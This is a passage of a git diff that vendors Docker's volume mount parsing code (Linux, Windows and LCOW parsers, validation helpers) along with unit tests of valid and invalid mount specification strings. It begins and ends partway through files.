"error while creating mount source path '%s'", m.Source) + } + } + } + } + return m.Source, nil +} + +// Path returns the path of a volume in a mount point. +func (m *MountPoint) Path() string { + if m.Volume != nil { + return m.Volume.Path() + } + return m.Source +} + +func errInvalidMode(mode string) error { + return errors.Errorf("invalid mode: %v", mode) +} + +func errInvalidSpec(spec string) error { + return errors.Errorf("invalid volume specification: '%s'", spec) +} diff --git a/vendor/github.com/docker/docker/volume/mounts/parser.go b/vendor/github.com/docker/docker/volume/mounts/parser.go new file mode 100644 index 0000000000..73681750ea --- /dev/null +++ b/vendor/github.com/docker/docker/volume/mounts/parser.go @@ -0,0 +1,47 @@ +package mounts // import "github.com/docker/docker/volume/mounts" + +import ( + "errors" + "runtime" + + "github.com/docker/docker/api/types/mount" +) + +const ( + // OSLinux is the same as runtime.GOOS on linux + OSLinux = "linux" + // OSWindows is the same as runtime.GOOS on windows + OSWindows = "windows" +) + +// ErrVolumeTargetIsRoot is returned when the target destination is root. +// It's used by both LCOW and Linux parsers. +var ErrVolumeTargetIsRoot = errors.New("invalid specification: destination can't be '/'") + +// Parser represents a platform specific parser for mount expressions +type Parser interface { + ParseMountRaw(raw, volumeDriver string) (*MountPoint, error) + ParseMountSpec(cfg mount.Mount) (*MountPoint, error) + ParseVolumesFrom(spec string) (string, string, error) + DefaultPropagationMode() mount.Propagation + ConvertTmpfsOptions(opt *mount.TmpfsOptions, readOnly bool) (string, error) + DefaultCopyMode() bool + ValidateVolumeName(name string) error + ReadWrite(mode string) bool + IsBackwardCompatible(m *MountPoint) bool + HasResource(m *MountPoint, absPath string) bool + ValidateTmpfsMountDestination(dest string) error + ValidateMountConfig(mt *mount.Mount) error +} + +// NewParser creates a parser for a given container OS, depending on the current host OS (linux on a windows host will resolve to an lcowParser) +func NewParser(containerOS string) Parser { + switch containerOS { + case OSWindows: + return &windowsParser{} + } + if runtime.GOOS == OSWindows { + return &lcowParser{} + } + return &linuxParser{} +} diff --git a/vendor/github.com/docker/docker/volume/mounts/parser_test.go b/vendor/github.com/docker/docker/volume/mounts/parser_test.go new file mode 100644 index 0000000000..347f7d9c4d --- /dev/null +++ b/vendor/github.com/docker/docker/volume/mounts/parser_test.go @@ -0,0 +1,480 @@ +package mounts // import "github.com/docker/docker/volume/mounts" + +import ( + "io/ioutil" + "os" + "runtime" + "strings" + "testing" + + "github.com/docker/docker/api/types/mount" +) + +type parseMountRawTestSet struct { + valid []string + invalid map[string]string +} + +func TestConvertTmpfsOptions(t *testing.T) { + type testCase struct { + opt mount.TmpfsOptions + readOnly bool + expectedSubstrings []string + unexpectedSubstrings []string + } + cases := []testCase{ + { + opt: mount.TmpfsOptions{SizeBytes: 1024 * 1024, Mode: 0700}, + readOnly: false, + expectedSubstrings: []string{"size=1m", "mode=700"}, + unexpectedSubstrings: []string{"ro"}, + }, + { + opt: mount.TmpfsOptions{}, + readOnly: true, + expectedSubstrings: []string{"ro"}, + unexpectedSubstrings: []string{}, + }, + } + p := &linuxParser{} + for _, c := range cases { + data, err := p.ConvertTmpfsOptions(&c.opt, c.readOnly) + if err != nil { + t.Fatalf("could not convert %+v (readOnly: %v) to string: %v", + c.opt, c.readOnly, err) + } + t.Logf("data=%q", data) + for _, s := range c.expectedSubstrings { + if !strings.Contains(data, s) { + t.Fatalf("expected substring: %s, got %v (case=%+v)", s, data, c) + } + } + for _, s := range c.unexpectedSubstrings { + if strings.Contains(data, s) { + t.Fatalf("unexpected substring: %s, got %v (case=%+v)", s, data, c) + } + } + } +} + +type mockFiProvider struct{} + +func (mockFiProvider) fileInfo(path string) (exists, isDir bool, err error) { + dirs := map[string]struct{}{ + `c:\`: {}, + `c:\windows\`: {}, + `c:\windows`: {}, + `c:\program files`: {}, + `c:\Windows`: {}, + `c:\Program Files (x86)`: {}, + `\\?\c:\windows\`: {}, + } + files := map[string]struct{}{ + `c:\windows\system32\ntdll.dll`: {}, + } + if _, ok := dirs[path]; ok { + return true, true, nil + } + if _, ok := files[path]; ok { + return true, false, nil + } + return false, false, nil +} + +func TestParseMountRaw(t *testing.T) { + + previousProvider := currentFileInfoProvider + defer func() { currentFileInfoProvider = previousProvider }() + currentFileInfoProvider = mockFiProvider{} + windowsSet := parseMountRawTestSet{ + valid: []string{ + `d:\`, + `d:`, + `d:\path`, + `d:\path with space`, + `c:\:d:\`, + `c:\windows\:d:`, + `c:\windows:d:\s p a c e`, + `c:\windows:d:\s p a c e:RW`, + `c:\program files:d:\s p a c e i n h o s t d i r`, + `0123456789name:d:`, + `MiXeDcAsEnAmE:d:`, + `name:D:`, + `name:D::rW`, + `name:D::RW`, + `name:D::RO`, + `c:/:d:/forward/slashes/are/good/too`, + `c:/:d:/including with/spaces:ro`, + `c:\Windows`, // With capital + `c:\Program Files (x86)`, // With capitals and brackets + `\\?\c:\windows\:d:`, // Long path handling (source) + `c:\windows\:\\?\d:\`, // Long path handling (target) + `\\.\pipe\foo:\\.\pipe\foo`, // named pipe + `//./pipe/foo://./pipe/foo`, // named pipe forward slashes + }, + invalid: map[string]string{ + ``: "invalid volume specification: ", + `.`: "invalid volume specification: ", + `..\`: "invalid volume specification: ", + `c:\:..\`: "invalid volume specification: ", + `c:\:d:\:xyzzy`: "invalid volume specification: ", + `c:`: "cannot be `c:`", + `c:\`: "cannot be `c:`", + `c:\notexist:d:`: `bind mount source path does not exist: c:\notexist`, + `c:\windows\system32\ntdll.dll:d:`: `source path must be a directory`, + `name<:d:`: `invalid volume specification`, + `name>:d:`: `invalid volume specification`, + `name::d:`: `invalid volume specification`, + `name":d:`: `invalid volume specification`, + `name\:d:`: `invalid volume specification`, + `name*:d:`: `invalid volume specification`, + `name|:d:`: `invalid volume specification`, + `name?:d:`: `invalid volume specification`, + `name/:d:`: `invalid volume specification`, + `d:\pathandmode:rw`: `invalid volume specification`, + `d:\pathandmode:ro`: `invalid volume specification`, + `con:d:`: `cannot be a reserved word for Windows filenames`, + `PRN:d:`: `cannot be a reserved word for Windows filenames`, + `aUx:d:`: `cannot be a reserved word for Windows filenames`, + `nul:d:`: `cannot be a reserved word for Windows filenames`, + `com1:d:`: `cannot be a reserved word for Windows filenames`, + `com2:d:`: `cannot be a reserved word for Windows filenames`, + `com3:d:`: `cannot be a reserved word for Windows filenames`, + `com4:d:`: `cannot be a reserved word for Windows filenames`, + `com5:d:`: `cannot be a reserved word for Windows filenames`, + `com6:d:`: `cannot be a reserved word for Windows filenames`, + `com7:d:`: `cannot be a reserved word for Windows filenames`, + `com8:d:`: `cannot be a reserved word for Windows filenames`, + `com9:d:`: `cannot be a reserved word for Windows filenames`, + `lpt1:d:`: `cannot be a reserved word for Windows filenames`, + `lpt2:d:`: `cannot be a reserved word for Windows filenames`, + `lpt3:d:`: `cannot be a reserved word for Windows filenames`, + `lpt4:d:`: `cannot be a reserved word for Windows filenames`, + `lpt5:d:`: `cannot be a reserved word for Windows filenames`, + `lpt6:d:`: `cannot be a reserved word for Windows filenames`, + `lpt7:d:`: `cannot be a reserved word for Windows filenames`, + `lpt8:d:`: `cannot be a reserved word for Windows filenames`, + `lpt9:d:`: `cannot be a reserved word for Windows filenames`, + `c:\windows\system32\ntdll.dll`: `Only directories can be mapped on this platform`, + `\\.\pipe\foo:c:\pipe`: `'c:\pipe' is not a valid pipe path`, + }, + } + lcowSet := parseMountRawTestSet{ + valid: []string{ + `/foo`, + `/foo/`, + `/foo bar`, + `c:\:/foo`, + `c:\windows\:/foo`, + `c:\windows:/s p a c e`, + `c:\windows:/s p a c e:RW`, + `c:\program files:/s p a c e i n h o s t d i r`, + `0123456789name:/foo`, + `MiXeDcAsEnAmE:/foo`, + `name:/foo`, + `name:/foo:rW`, + `name:/foo:RW`, + `name:/foo:RO`, + `c:/:/forward/slashes/are/good/too`, + `c:/:/including with/spaces:ro`, + `/Program Files (x86)`, // With capitals and brackets + }, + invalid: map[string]string{ + ``: "invalid volume specification: ", + `.`: "invalid volume specification: ", + `c:`: "invalid volume specification: ", + `c:\`: "invalid volume specification: ", + `../`: "invalid volume specification: ", + `c:\:../`: "invalid volume specification: ", + `c:\:/foo:xyzzy`: "invalid volume specification: ", + `/`: "destination can't be '/'", + `/..`: "destination can't be '/'", + `c:\notexist:/foo`: `bind mount source path does not exist: c:\notexist`, + `c:\windows\system32\ntdll.dll:/foo`: `source path must be a directory`, + `name<:/foo`: `invalid volume specification`, + `name>:/foo`: `invalid volume specification`, + `name::/foo`: `invalid volume specification`, + `name":/foo`: `invalid volume specification`, + `name\:/foo`: `invalid volume specification`, + `name*:/foo`: `invalid volume specification`, + `name|:/foo`: `invalid volume specification`, + `name?:/foo`: `invalid volume specification`, + `name/:/foo`: `invalid volume specification`, + `/foo:rw`: `invalid volume specification`, + `/foo:ro`: `invalid volume specification`, + `con:/foo`: `cannot be a reserved word for Windows filenames`, + `PRN:/foo`: `cannot be a reserved word for Windows filenames`, + `aUx:/foo`: `cannot be a reserved word for Windows filenames`, + `nul:/foo`: `cannot be a reserved word for Windows filenames`, + `com1:/foo`: `cannot be a reserved word for Windows filenames`, + `com2:/foo`: `cannot be a reserved word for Windows filenames`, + `com3:/foo`: `cannot be a reserved word for Windows filenames`, + `com4:/foo`: `cannot be a reserved word for Windows filenames`, + `com5:/foo`: `cannot be a reserved word for Windows filenames`, + `com6:/foo`: `cannot be a reserved word for Windows filenames`, + `com7:/foo`: `cannot be a reserved word for Windows filenames`, + `com8:/foo`: `cannot be a reserved word for Windows filenames`, + `com9:/foo`: `cannot be a reserved word for Windows filenames`, + `lpt1:/foo`: `cannot be a reserved word for Windows filenames`, + `lpt2:/foo`: `cannot be a reserved word for Windows filenames`, + `lpt3:/foo`: `cannot be a reserved word for Windows filenames`, + `lpt4:/foo`: `cannot be a reserved word for Windows filenames`, + `lpt5:/foo`: `cannot be a reserved word for Windows filenames`, + `lpt6:/foo`: `cannot be a reserved word for Windows filenames`, + `lpt7:/foo`: `cannot be a reserved word for Windows filenames`, + `lpt8:/foo`: `cannot be a reserved word for Windows filenames`, + `lpt9:/foo`: `cannot be a reserved word for Windows filenames`, + `\\.\pipe\foo:/foo`: `Linux containers on Windows do not support named pipe mounts`, + }, + } + linuxSet := parseMountRawTestSet{ + valid: []string{ + "/home", + "/home:/home", + "/home:/something/else", + "/with space", + "/home:/with space", + "relative:/absolute-path", + "hostPath:/containerPath:ro", + "/hostPath:/containerPath:rw", + "/rw:/ro", + "/hostPath:/containerPath:shared", + "/hostPath:/containerPath:rshared", + "/hostPath:/containerPath:slave", + "/hostPath:/containerPath:rslave", + "/hostPath:/containerPath:private", + "/hostPath:/containerPath:rprivate", + "/hostPath:/containerPath:ro,shared", + "/hostPath:/containerPath:ro,slave", + "/hostPath:/containerPath:ro,private", + "/hostPath:/containerPath:ro,z,shared", + "/hostPath:/containerPath:ro,Z,slave", + "/hostPath:/containerPath:Z,ro,slave", + "/hostPath:/containerPath:slave,Z,ro", + "/hostPath:/containerPath:Z,slave,ro", + "/hostPath:/containerPath:slave,ro,Z", + "/hostPath:/containerPath:rslave,ro,Z", + "/hostPath:/containerPath:ro,rshared,Z", + "/hostPath:/containerPath:ro,Z,rprivate", + }, + invalid: map[string]string{ + "": "invalid volume specification", + "./": "mount path must be absolute", + "../": "mount path must be absolute", + "/:../": "mount path must be absolute", + "/:path": "mount path must be absolute", + ":": "invalid volume specification", + "/tmp:": "invalid volume specification", + ":test": "invalid volume specification", + ":/test": "invalid volume specification", + "tmp:": "invalid volume specification", + ":test:": "invalid volume specification", + "::": "invalid volume specification", + ":::": "invalid volume specification", + "/tmp:::": "invalid volume specification", + ":/tmp::": "invalid volume specification", + "/path:rw": "invalid volume specification", + "/path:ro": "invalid volume specification", + "/rw:rw": "invalid volume specification", + "path:ro": "invalid volume specification", + "/path:/path:sw": `invalid mode`, + "/path:/path:rwz": `invalid mode`, + "/path:/path:ro,rshared,rslave": `invalid mode`, + "/path:/path:ro,z,rshared,rslave": `invalid mode`, + "/path:shared": "invalid volume specification", + "/path:slave": "invalid volume specification", + "/path:private": "invalid volume specification", + "name:/absolute-path:shared": "invalid volume specification", + "name:/absolute-path:rshared": "invalid volume specification", + "name:/absolute-path:slave": "invalid volume specification", + "name:/absolute-path:rslave": "invalid volume specification", + "name:/absolute-path:private": "invalid volume specification", + "name:/absolute-path:rprivate": "invalid volume specification", + }, + } + + linParser := &linuxParser{} + winParser := &windowsParser{} + lcowParser := &lcowParser{} + tester := func(parser Parser, set parseMountRawTestSet) { + + for _, path := range set.valid { + + if _, err := parser.ParseMountRaw(path, "local"); err != nil { + t.Errorf("ParseMountRaw(`%q`) should succeed: error %q", path, err) + } + } + + for path, expectedError := range set.invalid { + if mp, err := parser.ParseMountRaw(path, "local"); err == nil { + t.Errorf("ParseMountRaw(`%q`) should have failed validation. Err '%v' - MP: %v", path, err, mp) + } else { + if !strings.Contains(err.Error(), expectedError) { + t.Errorf("ParseMountRaw(`%q`) error should contain %q, got %v", path, expectedError, err.Error()) + } + } + } + } + tester(linParser, linuxSet) + tester(winParser, windowsSet) + tester(lcowParser, lcowSet) + +} + +// testParseMountRaw is a structure used by TestParseMountRawSplit for +// specifying test cases for the ParseMountRaw() function. +type testParseMountRaw struct { + bind string + driver string + expType mount.Type + expDest string + expSource string + expName string + expDriver string + expRW bool + fail bool +} + +func TestParseMountRawSplit(t *testing.T) { + previousProvider := currentFileInfoProvider + defer func() { currentFileInfoProvider = previousProvider }() + currentFileInfoProvider = mockFiProvider{} + windowsCases := []testParseMountRaw{ + {`c:\:d:`, "local", mount.TypeBind, `d:`, `c:\`, ``, "", true, false}, + {`c:\:d:\`, "local", mount.TypeBind, `d:\`, `c:\`, ``, "", true, false}, + {`c:\:d:\:ro`, "local", mount.TypeBind, `d:\`, `c:\`, ``, "", false, false}, + {`c:\:d:\:rw`, "local", mount.TypeBind, `d:\`, `c:\`, ``, "", true, false}, + {`c:\:d:\:foo`, "local", mount.TypeBind, `d:\`, `c:\`, ``, "", false, true}, + {`name:d::rw`, "local", mount.TypeVolume, `d:`, ``, `name`, "local", true, false}, + {`name:d:`, "local", mount.TypeVolume, `d:`, ``, `name`, "local", true, false}, + {`name:d::ro`, "local", mount.TypeVolume, `d:`, ``, `name`, "local", false, false}, + {`name:c:`, "", mount.TypeVolume, ``, ``, ``, "", true, true}, + {`driver/name:c:`, "", mount.TypeVolume, ``, ``, ``, "", true, true}, + {`\\.\pipe\foo:\\.\pipe\bar`, "local", mount.TypeNamedPipe, `\\.\pipe\bar`, `\\.\pipe\foo`, "", "", true, false}, + {`\\.\pipe\foo:c:\foo\bar`, "local", mount.TypeNamedPipe, ``, ``, "", "", true, true}, + {`c:\foo\bar:\\.\pipe\foo`, "local", mount.TypeNamedPipe, ``, ``, "", "", true, true}, + } + lcowCases := []testParseMountRaw{ + {`c:\:/foo`, "local", mount.TypeBind, `/foo`, `c:\`, ``, "", true, false}, + {`c:\:/foo:ro`, "local", mount.TypeBind, `/foo`, `c:\`, ``, "", false, false}, + {`c:\:/foo:rw`, "local", mount.TypeBind, `/foo`, `c:\`, ``, "", true, false}, + {`c:\:/foo:foo`, "local", mount.TypeBind, `/foo`, `c:\`, ``, "", false, true}, + {`name:/foo:rw`, "local", mount.TypeVolume, `/foo`, ``, `name`, "local", true, false}, + {`name:/foo`, "local", mount.TypeVolume, `/foo`, ``, `name`, "local", true, false}, + {`name:/foo:ro`, "local", mount.TypeVolume, `/foo`, ``, `name`, "local", false, false}, + {`name:/`, "", mount.TypeVolume, ``, ``, ``, "", true, true}, + {`driver/name:/`, "", mount.TypeVolume, ``, ``, ``, "", true, true}, + {`\\.\pipe\foo:\\.\pipe\bar`, "local", mount.TypeNamedPipe, `\\.\pipe\bar`, `\\.\pipe\foo`, "", "", true, true}, + {`\\.\pipe\foo:/data`, "local", mount.TypeNamedPipe, ``, ``, "", "", true, true}, + {`c:\foo\bar:\\.\pipe\foo`, "local", mount.TypeNamedPipe, ``, ``, "", "", true, true}, + } + linuxCases := []testParseMountRaw{ + {"/tmp:/tmp1", "", mount.TypeBind, "/tmp1", "/tmp", "", "", true, false}, + {"/tmp:/tmp2:ro", "", mount.TypeBind, "/tmp2", "/tmp", "", "", false, false}, + {"/tmp:/tmp3:rw", "", mount.TypeBind, "/tmp3", "/tmp", "", "", true, false}, + {"/tmp:/tmp4:foo", "", mount.TypeBind, "", "", "", "", false, true}, + {"name:/named1", "", mount.TypeVolume, "/named1", "", "name", "", true, false}, + {"name:/named2", "external", mount.TypeVolume, "/named2", "", "name", "external", true, false}, + {"name:/named3:ro", "local", mount.TypeVolume, "/named3", "", "name", "local", false, false}, + {"local/name:/tmp:rw", "", mount.TypeVolume, "/tmp", "", "local/name", "", true, false}, + {"/tmp:tmp", "", mount.TypeBind, "", "", "", "", true, true}, + } + linParser := &linuxParser{} + winParser := &windowsParser{} + lcowParser := &lcowParser{} + tester := func(parser Parser, cases []testParseMountRaw) { + for i, c := range cases { + t.Logf("case %d", i) + m, err := parser.ParseMountRaw(c.bind, c.driver) + if c.fail { + if err == nil { + t.Errorf("Expected error, was nil, for spec %s\n", c.bind) + } + continue + } + + if m == nil || err != nil { + t.Errorf("ParseMountRaw failed for spec '%s', driver '%s', error '%v'", c.bind, c.driver, err.Error()) + continue + } + + if m.Destination != c.expDest { + t.Errorf("Expected destination '%s, was %s', for spec '%s'", c.expDest, m.Destination, c.bind) + } + + if m.Source != c.expSource { + t.Errorf("Expected source '%s', was '%s', for spec '%s'", c.expSource, m.Source, c.bind) + } + + if m.Name != c.expName { + t.Errorf("Expected name '%s', was '%s' for spec '%s'", c.expName, m.Name, c.bind) + } + + if m.Driver != c.expDriver { + t.Errorf("Expected driver '%s', was '%s', for spec '%s'", c.expDriver, m.Driver, c.bind) + } + + if m.RW != c.expRW { + t.Errorf("Expected RW '%v', was '%v' for spec '%s'", c.expRW, m.RW, c.bind) + } + if m.Type != c.expType { + t.Fatalf("Expected type '%s', was '%s', for spec '%s'", c.expType, m.Type, c.bind) + } + } + } + + tester(linParser, linuxCases) + tester(winParser, windowsCases) + tester(lcowParser, lcowCases) +} + +func TestParseMountSpec(t *testing.T) { + type c struct { + input mount.Mount + expected MountPoint + } + testDir, err := ioutil.TempDir("", "test-mount-config") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(testDir) + parser := NewParser(runtime.GOOS) + cases := []c{ + {mount.Mount{Type: mount.TypeBind, Source: testDir, Target: testDestinationPath, ReadOnly: true}, MountPoint{Type: mount.TypeBind, Source: testDir, Destination: testDestinationPath, Propagation: parser.DefaultPropagationMode()}}, + {mount.Mount{Type: mount.TypeBind, Source: testDir, Target: testDestinationPath}, MountPoint{Type: mount.TypeBind, Source: testDir, Destination: testDestinationPath, RW: true, Propagation: parser.DefaultPropagationMode()}}, + {mount.Mount{Type: mount.TypeBind, Source: testDir + string(os.PathSeparator), Target: testDestinationPath, ReadOnly: true}, MountPoint{Type: mount.TypeBind, Source: testDir, Destination: testDestinationPath, Propagation: parser.DefaultPropagationMode()}}, + {mount.Mount{Type: mount.TypeBind, Source: testDir, Target: testDestinationPath + string(os.PathSeparator), ReadOnly: true}, MountPoint{Type: mount.TypeBind, Source: testDir, Destination: testDestinationPath, Propagation: parser.DefaultPropagationMode()}}, + {mount.Mount{Type: mount.TypeVolume, Target: testDestinationPath}, MountPoint{Type: mount.TypeVolume, Destination: testDestinationPath, RW: true, CopyData: parser.DefaultCopyMode()}}, + {mount.Mount{Type: mount.TypeVolume, Target: testDestinationPath + string(os.PathSeparator)}, MountPoint{Type: mount.TypeVolume, Destination: testDestinationPath, RW: true, CopyData: parser.DefaultCopyMode()}}, + } + + for i, c := range cases { + t.Logf("case %d", i) + mp, err := parser.ParseMountSpec(c.input) + if err != nil { + t.Error(err) + } + + if c.expected.Type != mp.Type { + t.Errorf("Expected mount types to match. Expected: '%s', Actual: '%s'", c.expected.Type, mp.Type) + } + if c.expected.Destination != mp.Destination { + t.Errorf("Expected mount destination to match. Expected: '%s', Actual: '%s'", c.expected.Destination, mp.Destination) + } + if c.expected.Source != mp.Source { + t.Errorf("Expected mount source to match. Expected: '%s', Actual: '%s'", c.expected.Source, mp.Source) + } + if c.expected.RW != mp.RW { + t.Errorf("Expected mount writable to match. Expected: '%v', Actual: '%v'", c.expected.RW, mp.RW) + } + if c.expected.Propagation != mp.Propagation { + t.Errorf("Expected mount propagation to match. Expected: '%v', Actual: '%s'", c.expected.Propagation, mp.Propagation) + } + if c.expected.Driver != mp.Driver { + t.Errorf("Expected mount driver to match. Expected: '%v', Actual: '%s'", c.expected.Driver, mp.Driver) + } + if c.expected.CopyData != mp.CopyData { + t.Errorf("Expected mount copy data to match. Expected: '%v', Actual: '%v'", c.expected.CopyData, mp.CopyData) + } + } +} diff --git a/vendor/github.com/docker/docker/volume/mounts/validate.go b/vendor/github.com/docker/docker/volume/mounts/validate.go new file mode 100644 index 0000000000..0b71526901 --- /dev/null +++ b/vendor/github.com/docker/docker/volume/mounts/validate.go @@ -0,0 +1,28 @@ +package mounts // import "github.com/docker/docker/volume/mounts" + +import ( + "fmt" + + "github.com/docker/docker/api/types/mount" + "github.com/pkg/errors" +) + +type errMountConfig struct { + mount *mount.Mount + err error +} + +func (e *errMountConfig) Error() string { + return fmt.Sprintf("invalid mount config for type %q: %v", e.mount.Type, e.err.Error()) +} + +func errBindSourceDoesNotExist(path string) error { + return errors.Errorf("bind mount source path does not exist: %s", path) +} + +func errExtraField(name string) error { + return errors.Errorf("field %s must not be specified", name) +} +func errMissingField(name string) error { + return errors.Errorf("field %s must not be empty", name) +} diff --git a/vendor/github.com/docker/docker/volume/mounts/validate_test.go b/vendor/github.com/docker/docker/volume/mounts/validate_test.go new file mode 100644 index 0000000000..4f83856043 --- /dev/null +++ b/vendor/github.com/docker/docker/volume/mounts/validate_test.go @@ -0,0 +1,73 @@ +package mounts // import "github.com/docker/docker/volume/mounts" + +import ( + "errors" + "io/ioutil" + "os" + "runtime" + "strings" + "testing" + + "github.com/docker/docker/api/types/mount" +) + +func TestValidateMount(t *testing.T) { + testDir, err := ioutil.TempDir("", "test-validate-mount") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(testDir) + + cases := []struct { + input mount.Mount + expected error + }{ + {mount.Mount{Type: mount.TypeVolume}, errMissingField("Target")}, + {mount.Mount{Type: mount.TypeVolume, Target: testDestinationPath, Source: "hello"}, nil}, + {mount.Mount{Type: mount.TypeVolume, Target: testDestinationPath}, nil}, + {mount.Mount{Type: mount.TypeBind}, errMissingField("Target")}, + {mount.Mount{Type: mount.TypeBind, Target: testDestinationPath}, errMissingField("Source")}, + {mount.Mount{Type: mount.TypeBind, Target: testDestinationPath, Source: testSourcePath, VolumeOptions: &mount.VolumeOptions{}}, errExtraField("VolumeOptions")}, + + {mount.Mount{Type: mount.TypeBind, Source: testDir, Target: testDestinationPath}, nil}, + {mount.Mount{Type: "invalid", Target: testDestinationPath}, errors.New("mount type unknown")}, + {mount.Mount{Type: mount.TypeBind, Source: testSourcePath, Target: testDestinationPath}, errBindSourceDoesNotExist(testSourcePath)}, + } + + lcowCases := []struct { + input mount.Mount + expected error + }{ + {mount.Mount{Type: mount.TypeVolume}, errMissingField("Target")}, + {mount.Mount{Type: mount.TypeVolume, Target: "/foo", Source: "hello"}, nil}, + {mount.Mount{Type: mount.TypeVolume, Target: "/foo"}, nil}, + {mount.Mount{Type: mount.TypeBind}, errMissingField("Target")}, + {mount.Mount{Type: mount.TypeBind, Target: "/foo"}, errMissingField("Source")}, + {mount.Mount{Type: mount.TypeBind, Target: "/foo", Source: "c:\\foo", VolumeOptions: &mount.VolumeOptions{}}, errExtraField("VolumeOptions")}, + {mount.Mount{Type: mount.TypeBind, Source: "c:\\foo", Target: "/foo"}, errBindSourceDoesNotExist("c:\\foo")}, + {mount.Mount{Type: mount.TypeBind, Source: testDir, Target: "/foo"}, nil}, + {mount.Mount{Type: "invalid", Target: "/foo"}, errors.New("mount type unknown")}, + } + parser := NewParser(runtime.GOOS) + for i, x := range cases { + err := parser.ValidateMountConfig(&x.input) + if err == nil && x.expected == nil { + continue + } + if (err == nil && x.expected != nil) || (x.expected == nil && err != nil) || !strings.Contains(err.Error(), x.expected.Error()) { + t.Errorf("expected %q, got %q, case: %d", x.expected, err, i) + } + } + if runtime.GOOS == "windows" { + parser = &lcowParser{} + for i, x := range lcowCases { + err := parser.ValidateMountConfig(&x.input) + if err == nil && x.expected == nil { + continue + } + if (err == nil && x.expected != nil) || (x.expected == nil && err != nil) || !strings.Contains(err.Error(), x.expected.Error()) { + t.Errorf("expected %q, got %q, case: %d", x.expected, err, i) + } + } + } +} diff --git a/vendor/github.com/docker/docker/volume/validate_test_unix.go b/vendor/github.com/docker/docker/volume/mounts/validate_unix_test.go similarity index 57% rename from vendor/github.com/docker/docker/volume/validate_test_unix.go rename to vendor/github.com/docker/docker/volume/mounts/validate_unix_test.go index dd1de2f643..a319371451 100644 --- a/vendor/github.com/docker/docker/volume/validate_test_unix.go +++ b/vendor/github.com/docker/docker/volume/mounts/validate_unix_test.go @@ -1,6 +1,6 @@ // +build !windows -package volume +package mounts // import "github.com/docker/docker/volume/mounts" var ( testDestinationPath = "/foo" diff --git a/vendor/github.com/docker/docker/volume/validate_test_windows.go b/vendor/github.com/docker/docker/volume/mounts/validate_windows_test.go similarity index 52% rename from vendor/github.com/docker/docker/volume/validate_test_windows.go rename to vendor/github.com/docker/docker/volume/mounts/validate_windows_test.go index d5f86ac850..74b40a6c30 100644 --- a/vendor/github.com/docker/docker/volume/validate_test_windows.go +++ b/vendor/github.com/docker/docker/volume/mounts/validate_windows_test.go @@ -1,4 +1,4 @@ -package volume +package mounts // import "github.com/docker/docker/volume/mounts" var ( testDestinationPath = `c:\foo` diff --git a/vendor/github.com/docker/docker/volume/volume_copy.go b/vendor/github.com/docker/docker/volume/mounts/volume_copy.go similarity index 73% rename from vendor/github.com/docker/docker/volume/volume_copy.go rename to vendor/github.com/docker/docker/volume/mounts/volume_copy.go index 77f06a0d1f..04056fa50a 100644 --- a/vendor/github.com/docker/docker/volume/volume_copy.go +++ b/vendor/github.com/docker/docker/volume/mounts/volume_copy.go @@ -1,4 +1,4 @@ -package volume +package mounts // import "github.com/docker/docker/volume/mounts" import "strings" @@ -13,11 +13,11 @@ func copyModeExists(mode string) bool { } // GetCopyMode gets the copy mode from the mode string for mounts -func getCopyMode(mode string) (bool, bool) { +func getCopyMode(mode string, def bool) (bool, bool) { for _, o := range strings.Split(mode, ",") { if isEnabled, exists := copyModes[o]; exists { return isEnabled, true } } - return DefaultCopyMode, false + return def, false } diff --git a/vendor/github.com/docker/docker/volume/mounts/volume_unix.go b/vendor/github.com/docker/docker/volume/mounts/volume_unix.go new file mode 100644 index 0000000000..c6d51e0710 --- /dev/null +++ b/vendor/github.com/docker/docker/volume/mounts/volume_unix.go @@ -0,0 +1,18 @@ +// +build linux freebsd darwin + +package mounts // import "github.com/docker/docker/volume/mounts" + +import ( + "fmt" + "path/filepath" + "strings" +) + +func (p *linuxParser) HasResource(m *MountPoint, absolutePath string) bool { + relPath, err := filepath.Rel(m.Destination, absolutePath) + return err == nil && relPath != ".." && !strings.HasPrefix(relPath, fmt.Sprintf("..%c", filepath.Separator)) +} + +func (p *windowsParser) HasResource(m *MountPoint, absolutePath string) bool { + return false +} diff --git a/vendor/github.com/docker/docker/volume/mounts/volume_windows.go b/vendor/github.com/docker/docker/volume/mounts/volume_windows.go new file mode 100644 index 0000000000..773e7db88a --- /dev/null +++ b/vendor/github.com/docker/docker/volume/mounts/volume_windows.go @@ -0,0 +1,8 @@ +package mounts // import "github.com/docker/docker/volume/mounts" + +func (p *windowsParser) HasResource(m *MountPoint, absolutePath string) bool { + return false +} +func (p *linuxParser) HasResource(m *MountPoint, absolutePath string) bool { + return false +} diff --git a/vendor/github.com/docker/docker/volume/mounts/windows_parser.go b/vendor/github.com/docker/docker/volume/mounts/windows_parser.go new file mode 100644 index 0000000000..ac61044043 --- /dev/null +++ b/vendor/github.com/docker/docker/volume/mounts/windows_parser.go @@ -0,0 +1,456 @@ +package mounts // import "github.com/docker/docker/volume/mounts" + +import ( + "errors" + "fmt" + "os" + "regexp" + "runtime" + "strings" + + "github.com/docker/docker/api/types/mount" + "github.com/docker/docker/pkg/stringid" +) + +type windowsParser struct { +} + +const ( + // Spec should be in the format [source:]destination[:mode] + // + // Examples: c:\foo bar:d:rw + // c:\foo:d:\bar + // myname:d: + // d:\ + // + // Explanation of this regex! Thanks @thaJeztah on IRC and gist for help. See + // https://gist.github.com/thaJeztah/6185659e4978789fb2b2. A good place to + // test is https://regex-golang.appspot.com/assets/html/index.html + // + // Useful link for referencing named capturing groups: + // http://stackoverflow.com/questions/20750843/using-named-matches-from-go-regex + // + // There are three match groups: source, destination and mode. + // + + // rxHostDir is the first option of a source + rxHostDir = `(?:\\\\\?\\)?[a-z]:[\\/](?:[^\\/:*?"<>|\r\n]+[\\/]?)*` + // rxName is the second option of a source + rxName = `[^\\/:*?"<>|\r\n]+` + + // RXReservedNames are reserved names not possible on Windows + rxReservedNames = `(con)|(prn)|(nul)|(aux)|(com[1-9])|(lpt[1-9])` + + // rxPipe is a named path pipe (starts with `\\.\pipe\`, possibly with / instead of \) + rxPipe = `[/\\]{2}.[/\\]pipe[/\\][^:*?"<>|\r\n]+` + // rxSource is the combined possibilities for a source + rxSource = `((?P((` + rxHostDir + `)|(` + rxName + `)|(` + rxPipe + `))):)?` + + // Source. Can be either a host directory, a name, or omitted: + // HostDir: + // - Essentially using the folder solution from + // https://www.safaribooksonline.com/library/view/regular-expressions-cookbook/9781449327453/ch08s18.html + // but adding case insensitivity. + // - Must be an absolute path such as c:\path + // - Can include spaces such as `c:\program files` + // - And then followed by a colon which is not in the capture group + // - And can be optional + // 